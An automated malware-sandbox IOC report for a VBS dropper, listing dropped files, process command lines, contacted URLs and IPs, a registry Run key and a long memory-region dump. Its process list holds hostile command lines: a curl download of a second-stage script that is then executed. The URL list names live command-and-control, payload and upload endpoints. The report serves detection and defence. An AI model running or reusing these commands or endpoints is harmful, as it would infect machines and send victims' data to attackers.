IOC Report
6724f91d7b548.vbs

loading gif

Files

File Path
Type
Category
Malicious
6724f91d7b548.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\Public\6724f91d7b54a.vbs
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\hcx.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\7zxa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\CSRPS.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\unrar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d4454w[1].zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Composite Document File V2 Document, Cannot read section info
dropped
C:\_6724f91d7b3cb\CSRPS.dll
data
dropped
C:\_6724f91d7b3cb\MPDK.bat
ASCII text, with CRLF line terminators
modified
C:\_6724f91d7b3cb\downloaded.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6724f91d7b548.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
malicious
C:\Windows\System32\curl.exe
curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
malicious
C:\_6724f91d7b3cb\CSRPS.exe
"C:\_6724f91d7b3cb\CSRPS.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 57 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://64.94.85.196/d4454w.zip
64.94.85.196
malicious
http://64.94.85.196/contador/index.php?nomepc=user-PC
64.94.85.196
malicious
http://www.ghisler.com/plugins.htm
unknown
http://www.scootersoftware.com. 
unknown
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
unknown
http://64.94.85.196/contador/index.php?nomepc=
unknown
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
unknown
http://www.embarcadero.com/products/delphi
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsWinsta0
unknown
http://www.scootersoftware.com/bugRepMailer.php
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs9
unknown
http://worldtimeapi.org/api/ip
unknown
http://www.totalcmd.net/directory/packer.html
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsa
unknown
http://64.94.85.196/d4454w.zipEB
unknown
http://www.indyproject.org/
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs#
unknown
http://www.scootersoftware.com/buynow?bld=%dS
unknown
http://worldtimeapi.org:80/api/ip0
unknown
http://www.scootersoftware.com/upgrade
unknown
http://www.scootersoftware.com/
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsl
unknown
http://www.scootersoftware.com/buynow?bld=%d
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsk
unknown
http://70.34.247.142/UPLOADMAISL.phpU
unknown
http://www.scootersoftware.com/support.php
unknown
http://www.scootersoftware.com/download.phpS
unknown
http://www.scootersoftware.com/download.php
unknown
http://worldtimeapi.org/
unknown
http://64.94.85.196/contador/index.php?nomepc=user-PCClasses
unknown
http://www.scootersoftware.com/v3formats
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
198.54.116.219
http://www.scootersoftware.com/upgradeite
unknown
http://www.secureblackbox.com
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbscurl
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsiq
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
processoeconsulta.online
198.54.116.219
worldtimeapi.org
213.188.196.246

IPs

IP
Domain
Country
Malicious
64.94.85.196
unknown
United States
malicious
127.0.0.1
unknown
unknown
malicious
213.188.196.246
worldtimeapi.org
Italy
198.54.116.219
processoeconsulta.online
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
CacheID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
CSRPS

Memdumps

Base Address
Regiontype
Protect
Malicious
2AD5000
heap
page read and write
2B69000
direct allocation
page read and write
29B1000
heap
page read and write
2C7F000
unkown
page read and write
B13000
unkown
page read and write
17A00AC1000
heap
page read and write
2B4B000
direct allocation
page read and write
B2F0000
trusted library allocation
page read and write
1F5A2416000
heap
page read and write
2FF7000
heap
page read and write
2D5F000
stack
page read and write
309A000
heap
page read and write
29B1000
heap
page read and write
176523E2000
heap
page read and write
EA6000
heap
page read and write
2BB9000
direct allocation
page read and write
17651222000
heap
page read and write
1765032C000
heap
page read and write
17651E56000
heap
page read and write
17650BB0000
heap
page read and write
2FDE000
stack
page read and write
1765072C000
heap
page read and write
B28000
unkown
page write copy
422000
unkown
page execute read
2C80000
heap
page read and write
B29000
unkown
page read and write
B31000
unkown
page readonly
B315000
trusted library allocation
page read and write
3160000
heap
page read and write
299D000
stack
page read and write
17A00B15000
heap
page read and write
29B1000
heap
page read and write
9304000
unkown
page readonly
92D1000
unkown
page readonly
9311000
unkown
page readonly
17650F4C000
heap
page read and write
17650737000
heap
page read and write
17A00ADA000
heap
page read and write
ADD5000
direct allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1765073F000
heap
page read and write
2342FB90000
heap
page read and write
17A00AA7000
heap
page read and write
A2B6000
direct allocation
page read and write
AE6C000
direct allocation
page read and write
17650737000
heap
page read and write
17650BF2000
heap
page read and write
2D20000
heap
page read and write
2B10000
heap
page read and write
B2F0000
trusted library allocation
page read and write
1F5A2678000
heap
page read and write
17651222000
heap
page read and write
36A0000
heap
page read and write
3360000
heap
page read and write
EA1000
heap
page read and write
29B1000
heap
page read and write
2F27000
heap
page read and write
1F5A241B000
heap
page read and write
E3C000
heap
page read and write
2BCF000
direct allocation
page read and write
8F8E000
unkown
page write copy
29C0000
heap
page read and write
17651D90000
heap
page read and write
29B1000
heap
page read and write
17A00ABF000
heap
page read and write
2FF0000
heap
page read and write
29B1000
heap
page read and write
2F46000
heap
page read and write
17650266000
heap
page read and write
300F000
stack
page read and write
29B1000
heap
page read and write
1F5A2360000
heap
page read and write
336B000
heap
page read and write
1F5A2416000
heap
page read and write
29B1000
heap
page read and write
9337000
unkown
page readonly
A3FC000
direct allocation
page read and write
2B5E000
unkown
page read and write
E99000
heap
page read and write
61BC000
unkown
page execute read
2342FBE9000
heap
page read and write
34D8EFF000
stack
page read and write
176500DA000
heap
page read and write
771D000
unkown
page execute read
34D8AFE000
stack
page read and write
2F49000
heap
page read and write
DC4000
heap
page read and write
176502EA000
heap
page read and write
17651C04000
heap
page read and write
17651E98000
heap
page read and write
176514F8000
heap
page read and write
1765032C000
heap
page read and write
1F5A2419000
heap
page read and write
1765074C000
heap
page read and write
89EC000
unkown
page execute read
2DE3000
heap
page read and write
17650745000
heap
page read and write
34D89FE000
stack
page read and write
17652067000
heap
page read and write
17650762000
heap
page read and write
17652066000
heap
page read and write
29B1000
heap
page read and write
17650AEA000
heap
page read and write
1764FE24000
heap
page read and write
17652276000
heap
page read and write
17651C88000
heap
page read and write
1765091C000
heap
page read and write
2B7F000
direct allocation
page read and write
17651DD2000
heap
page read and write
B46E000
stack
page read and write
1764FC98000
heap
page read and write
3080000
heap
page read and write
933A000
unkown
page readonly
31CF000
unkown
page read and write
29B1000
heap
page read and write
17A02424000
heap
page read and write
8F96000
unkown
page write copy
17650735000
heap
page read and write
1764FADA000
heap
page read and write
3476000
heap
page read and write
27EC000
stack
page read and write
2ECE000
stack
page read and write
ADE3000
direct allocation
page read and write
1F5A2445000
heap
page read and write
17651EDB000
heap
page read and write
EB5000
heap
page read and write
3007000
heap
page read and write
6B15000
unkown
page execute read
2B9C000
direct allocation
page read and write
2BE5000
direct allocation
page read and write
1765074C000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
93B8000
unkown
page readonly
29B1000
heap
page read and write
1764A417000
heap
page read and write
3476000
heap
page read and write
1764FD5E000
heap
page read and write
6917000
unkown
page execute read
29B1000
heap
page read and write
B56E000
stack
page read and write
9089000
unkown
page read and write
29B1000
heap
page read and write
E00000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
8FB2000
unkown
page write copy
9FBE000
direct allocation
page read and write
176508DA000
heap
page read and write
17650686000
heap
page read and write
AF8000
unkown
page read and write
29B1000
heap
page read and write
B1B4000
direct allocation
page read and write
1764A4C0000
heap
page read and write
176517E4000
heap
page read and write
12D17000
heap
page read and write
2FAE000
stack
page read and write
1765132A000
heap
page read and write
1764FEA8000
heap
page read and write
936E000
unkown
page readonly
90B7000
unkown
page write copy
17650742000
heap
page read and write
29B1000
heap
page read and write
176502EB000
heap
page read and write
1764FD1C000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1764A7D1000
heap
page read and write
17651BC3000
heap
page read and write
17652234000
heap
page read and write
29B1000
heap
page read and write
B03E000
stack
page read and write
1764ACD0000
heap
page read and write
EB1000
heap
page read and write
2F36000
heap
page read and write
2F27000
heap
page read and write
1765153A000
heap
page read and write
2342FC2B000
heap
page read and write
E99000
heap
page read and write
29B1000
heap
page read and write
EB7000
heap
page read and write
3380000
heap
page read and write
231C000
stack
page read and write
176519F4000
heap
page read and write
29B1000
heap
page read and write
2C90000
heap
page read and write
17E000
unkown
page read and write
17650E02000
heap
page read and write
17651AFC000
heap
page read and write
176521B0000
heap
page read and write
176502A8000
heap
page read and write
17650D3C000
heap
page read and write
29B1000
heap
page read and write
2AA0000
heap
page read and write
A420000
direct allocation
page read and write
17A00AA7000
heap
page read and write
176501A0000
heap
page read and write
2B36000
direct allocation
page read and write
2CFD000
stack
page read and write
2342FBFF000
heap
page read and write
B317000
trusted library allocation
page read and write
1F5A242B000
heap
page read and write
2F49000
heap
page read and write
E3E000
heap
page read and write
17650762000
heap
page read and write
907E000
unkown
page read and write
1765073C000
heap
page read and write
9FF4000
direct allocation
page read and write
939A000
unkown
page readonly
A38C000
direct allocation
page read and write
1765072C000
heap
page read and write
17A00AC5000
heap
page read and write
17650F0A000
heap
page read and write
29B1000
heap
page read and write
9476000
unkown
page readonly
1765073D000
heap
page read and write
1765119E000
heap
page read and write
D35F000
heap
page read and write
904C000
unkown
page read and write
12CD0000
heap
page read and write
17651D4E000
heap
page read and write
9402000
unkown
page readonly
17651432000
heap
page read and write
54ED000
unkown
page execute read
2B7C000
stack
page read and write
29B1000
heap
page read and write
17651474000
heap
page read and write
29B1000
heap
page read and write
A027000
direct allocation
page read and write
E0A000
heap
page read and write
2F20000
heap
page read and write
2AFD000
stack
page read and write
29B1000
heap
page read and write
176519F4000
heap
page read and write
17A00A98000
heap
page read and write
414000
unkown
page execute read
176507D2000
heap
page read and write
1765115C000
heap
page read and write
2F00000
heap
page read and write
2FA0000
heap
page read and write
1764FF91000
heap
page read and write
29B1000
heap
page read and write
2342FC11000
heap
page read and write
E71000
heap
page read and write
34D93FB000
stack
page read and write
17651012000
heap
page read and write
6FCD0000
unkown
page readonly
1764A47E000
heap
page read and write
2E8F000
unkown
page read and write
2B5A000
direct allocation
page read and write
1765111A000
heap
page read and write
17650099000
heap
page read and write
17650752000
heap
page read and write
74ED000
unkown
page execute read
17651012000
heap
page read and write
EB1000
heap
page read and write
17650F0A000
heap
page read and write
1F5A2410000
heap
page read and write
2F40000
heap
page read and write
3476000
heap
page read and write
29B1000
heap
page read and write
DC4000
heap
page read and write
17650014000
heap
page read and write
1F5A2420000
heap
page read and write
29B1000
heap
page read and write
176511E1000
heap
page read and write
1764ABD1000
heap
page read and write
2BF3000
direct allocation
page read and write
29B1000
heap
page read and write
E69000
heap
page read and write
17652024000
heap
page read and write
2F00000
heap
page read and write
29B1000
heap
page read and write
3310000
heap
page read and write
8FD1000
unkown
page write copy
17650EC8000
heap
page read and write
93E9000
unkown
page readonly
29B0000
heap
page read and write
781D6FE000
stack
page read and write
2CC6000
heap
page read and write
17650765000
heap
page read and write
1F5A4331000
heap
page read and write
6CC6000
unkown
page execute read
29B1000
heap
page read and write
D5AB000
trusted library allocation
page read and write
2F2A000
heap
page read and write
2FB0000
heap
page read and write
D2C2000
heap
page read and write
2AE0000
direct allocation
page read and write
9393000
unkown
page readonly
EDB000
heap
page read and write
9FC5000
direct allocation
page read and write
1F5A2401000
heap
page read and write
42C000
unkown
page execute read
29B1000
heap
page read and write
E99000
heap
page read and write
17651A78000
heap
page read and write
2CB6000
heap
page read and write
17651E14000
heap
page read and write
1764FDE2000
heap
page read and write
90B6000
unkown
page read and write
2F10000
heap
page read and write
2DF0000
heap
page read and write
17651C04000
heap
page read and write
29B1000
heap
page read and write
1764A4C0000
heap
page read and write
29B1000
heap
page read and write
17650224000
heap
page read and write
32AE000
unkown
page read and write
A220000
direct allocation
page read and write
A2FC000
direct allocation
page read and write
2342FBCE000
heap
page read and write
32C0000
heap
page read and write
54D3000
unkown
page execute read
1765075F000
heap
page read and write
A05D000
direct allocation
page read and write
8E000
stack
page read and write
2F8E000
unkown
page read and write
12ED2000
heap
page read and write
17650434000
heap
page read and write
17650DC0000
heap
page read and write
9FB3000
direct allocation
page read and write
ACB000
unkown
page write copy
17650CB8000
heap
page read and write
1765157C000
heap
page read and write
29B1000
heap
page read and write
2342FCD0000
remote allocation
page read and write
17651C46000
heap
page read and write
31AF000
unkown
page read and write
AEC000
unkown
page write copy
2C8B000
heap
page read and write
2E2E000
unkown
page read and write
17650726000
heap
page read and write
345F000
heap
page read and write
17A00ADA000
heap
page read and write
D2B4000
heap
page read and write
29B1000
heap
page read and write
2BA0000
heap
page read and write
939C000
unkown
page readonly
17A00B1D000
heap
page read and write
26ED000
stack
page read and write
2342FBD0000
heap
page read and write
E6E000
heap
page read and write
17651054000
heap
page read and write
E39000
heap
page read and write
2FF7000
heap
page read and write
32C0000
heap
page read and write
1765072C000
heap
page read and write
17650752000
heap
page read and write
1764FF2C000
heap
page read and write
3097000
heap
page read and write
17651A78000
heap
page read and write
1765071D000
heap
page read and write
E9B000
heap
page read and write
17651D90000
heap
page read and write
176505C0000
heap
page read and write
2E5A000
heap
page read and write
1765075B000
heap
page read and write
35D0000
heap
page read and write
1764FC90000
heap
page read and write
8FCD000
unkown
page read and write
2FDC000
heap
page read and write
377E000
stack
page read and write
1F5A242F000
heap
page read and write
29B1000
heap
page read and write
938C000
unkown
page readonly
2342FC44000
heap
page read and write
176513F0000
heap
page read and write
17650EC9000
heap
page read and write
A02E000
direct allocation
page read and write
9451000
unkown
page readonly
AEB0000
trusted library allocation
page read and write
110E000
stack
page read and write
2743000
heap
page read and write
29B1000
heap
page read and write
17652024000
heap
page read and write
17650727000
heap
page read and write
3479000
heap
page read and write
E39000
heap
page read and write
1764FC8F000
heap
page read and write
176511E0000
heap
page read and write
2DD0000
heap
page read and write
17651868000
heap
page read and write
17A00B1D000
heap
page read and write
941A000
unkown
page readonly
3386000
heap
page read and write
17650B6E000
heap
page read and write
358F000
stack
page read and write
2B86000
direct allocation
page read and write
EA1000
heap
page read and write
363F000
unkown
page read and write
1764FC14000
heap
page read and write
1765070A000
heap
page read and write
27AD000
stack
page read and write
1F5A23F0000
heap
page read and write
29B1000
heap
page read and write
2DD0000
heap
page read and write
17650716000
heap
page read and write
31EF000
stack
page read and write
9322000
unkown
page readonly
1765072C000
heap
page read and write
29B1000
heap
page read and write
E99000
heap
page read and write
17650742000
heap
page read and write
17651FA0000
heap
page read and write
2FD0000
heap
page read and write
2E2F000
unkown
page read and write
DC4000
heap
page read and write
A035000
direct allocation
page read and write
29B1000
heap
page read and write
2FA0000
heap
page read and write
176521B0000
heap
page read and write
1765073A000
heap
page read and write
2758000
heap
page read and write
1765132A000
heap
page read and write
2D00000
heap
page read and write
1F5A2390000
heap
page read and write
29B1000
heap
page read and write
8F61000
unkown
page execute read
1764A4C0000
heap
page read and write
ABC7000
stack
page read and write
8FAF000
unkown
page read and write
92FE000
unkown
page readonly
90AE000
unkown
page write copy
3360000
heap
page read and write
93F5000
unkown
page readonly
9FA0000
direct allocation
page read and write
8F9C000
unkown
page write copy
17650CFA000
heap
page read and write
29B1000
heap
page read and write
1765073C000
heap
page read and write
1765075B000
heap
page read and write
2BC8000
direct allocation
page read and write
2C9B000
heap
page read and write
1764A452000
heap
page read and write
1764A4C0000
heap
page read and write
12CD3000
heap
page read and write
93AB000
unkown
page readonly
ABC000
unkown
page read and write
1764A457000
heap
page read and write
33AF000
unkown
page read and write
90AC000
unkown
page read and write
2E7B000
heap
page read and write
8FBA000
unkown
page write copy
E6F000
heap
page read and write
2E20000
heap
page read and write
17651CCB000
heap
page read and write
2E70000
heap
page read and write
17650098000
heap
page read and write
2E30000
heap
page read and write
2F49000
heap
page read and write
D319000
heap
page read and write
2740000
heap
page read and write
AB3000
unkown
page read and write
2342FBEA000
heap
page read and write
2B2E000
direct allocation
page read and write
176501E2000
heap
page read and write
1765075B000
heap
page read and write
8F8D000
unkown
page read and write
17651D0C000
heap
page read and write
17651642000
heap
page read and write
945B000
unkown
page readonly
65AA000
unkown
page execute read
176501A0000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1765036E000
heap
page read and write
B16000
unkown
page read and write
2CB7000
heap
page read and write
B2B0000
direct allocation
page execute and read and write
2342FBE9000
heap
page read and write
B13F000
stack
page read and write
EA9000
heap
page read and write
B1C000
unkown
page read and write
29B1000
heap
page read and write
2D80000
heap
page read and write
176509E2000
heap
page read and write
29B1000
heap
page read and write
2EF0000
heap
page read and write
17650C76000
heap
page read and write
17651FE3000
heap
page read and write
1765073A000
heap
page read and write
D2DF000
heap
page read and write
1764A44A000
heap
page read and write
176518EC000
heap
page read and write
AE61000
direct allocation
page read and write
AD2000
unkown
page read and write
43A0000
heap
page read and write
1764A4C0000
heap
page read and write
2BA4000
direct allocation
page read and write
3060000
heap
page read and write
29B1000
heap
page read and write
3097000
heap
page read and write
17650C34000
heap
page read and write
29B1000
heap
page read and write
EF2000
heap
page read and write
2CC6000
heap
page read and write
1765073D000
heap
page read and write
10CE000
stack
page read and write
CAB0000
trusted library allocation
page read and write
1765075C000
heap
page read and write
8F8F000
unkown
page read and write
93CB000
unkown
page readonly
176514F8000
heap
page read and write
29B1000
heap
page read and write
1764A8D0000
heap
page read and write
6E7B000
unkown
page execute read
29B1000
heap
page read and write
2F46000
heap
page read and write
92EC000
unkown
page readonly
1764AACE000
heap
page read and write
1764FA14000
heap
page read and write
EB5000
heap
page read and write
17A04360000
trusted library allocation
page read and write
17650723000
heap
page read and write
1765057E000
heap
page read and write
EE7000
heap
page read and write
2F10000
heap
page read and write
2743000
heap
page read and write
1765074C000
heap
page read and write
29B1000
heap
page read and write
2342FE10000
heap
page read and write
29B1000
heap
page read and write
2DE0000
heap
page read and write
54EC000
unkown
page execute and read and write
1F5A2410000
heap
page read and write
2342FBCC000
heap
page read and write
1765053C000
heap
page read and write
2B10000
heap
page read and write
2F1E000
unkown
page read and write
29B1000
heap
page read and write
A387000
direct allocation
page read and write
3007000
heap
page read and write
300A000
heap
page read and write
934C000
unkown
page readonly
29B1000
heap
page read and write
E31000
heap
page read and write
29B1000
heap
page read and write
92F5000
unkown
page readonly
EBB000
heap
page read and write
12ED0000
heap
page read and write
29B1000
heap
page read and write
43D0000
direct allocation
page execute and read and write
2CC6000
heap
page read and write
2342FCD0000
remote allocation
page read and write
D38C000
heap
page read and write
17650D3D000
heap
page read and write
EE3000
heap
page read and write
9FDA000
direct allocation
page read and write
A1D0000
direct allocation
page read and write
29B1000
heap
page read and write
176522FB000
heap
page read and write
355F000
unkown
page read and write
29B1000
heap
page read and write
340E000
unkown
page read and write
A2B4000
direct allocation
page read and write
7450CFD000
stack
page read and write
17650476000
heap
page read and write
29B1000
heap
page read and write
320E000
unkown
page read and write
1765075B000
heap
page read and write
8FA0000
unkown
page write copy
17A041E0000
heap
page read and write
2746000
heap
page read and write
17650742000
heap
page read and write
29B1000
heap
page read and write
A59E000
stack
page read and write
1765074C000
heap
page read and write
339A000
heap
page read and write
1104C000
stack
page read and write
17650736000
heap
page read and write
2F2F000
heap
page read and write
D3AD000
heap
page read and write
A630000
heap
page read and write
B42D000
stack
page read and write
1F5A241A000
heap
page read and write
11150000
remote allocation
page read and write
947F000
unkown
page readonly
2DE0000
heap
page read and write
1765157C000
heap
page read and write
653D000
unkown
page execute read
1765095E000
heap
page read and write
92F1000
unkown
page readonly
17651B80000
heap
page read and write
B24E000
direct allocation
page read and write
176518AA000
heap
page read and write
2CC7000
heap
page read and write
275A000
heap
page read and write
344B000
heap
page read and write
9FE9000
direct allocation
page read and write
12D00000
heap
page read and write
176513AE000
heap
page read and write
176504FA000
heap
page read and write
1114D000
stack
page read and write
A1A2000
direct allocation
page read and write
3476000
heap
page read and write
2DEC000
stack
page read and write
309A000
heap
page read and write
29B1000
heap
page read and write
7FEC000
unkown
page execute read
29B1000
heap
page read and write
54D2000
unkown
page execute and read and write
17650729000
heap
page read and write
17651E14000
heap
page read and write
A1E8000
direct allocation
page read and write
29B1000
heap
page read and write
17A00B30000
heap
page read and write
176510D8000
heap
page read and write
2E60000
heap
page read and write
1765074D000
heap
page read and write
2757000
heap
page read and write
2BDD000
direct allocation
page read and write
29B1000
heap
page read and write
2B17000
direct allocation
page read and write
2D8D000
stack
page read and write
29B1000
heap
page read and write
944F000
unkown
page readonly
369F000
stack
page read and write
2D50000
heap
page read and write
17650735000
heap
page read and write
23F0000
heap
page read and write
29B1000
heap
page read and write
2B8D000
direct allocation
page read and write
90AB000
unkown
page write copy
29B1000
heap
page read and write
29B1000
heap
page read and write
17651868000
heap
page read and write
1765073A000
heap
page read and write
17650728000
heap
page read and write
17A00AC3000
heap
page read and write
2F46000
heap
page read and write
29B1000
heap
page read and write
93A6000
unkown
page readonly
2ADB000
heap
page read and write
A046000
direct allocation
page read and write
B317000
trusted library allocation
page read and write
6FCD1000
unkown
page execute read
8F89000
unkown
page read and write
2E7E000
stack
page read and write
7450EFE000
stack
page read and write
309A000
heap
page read and write
17A00A45000
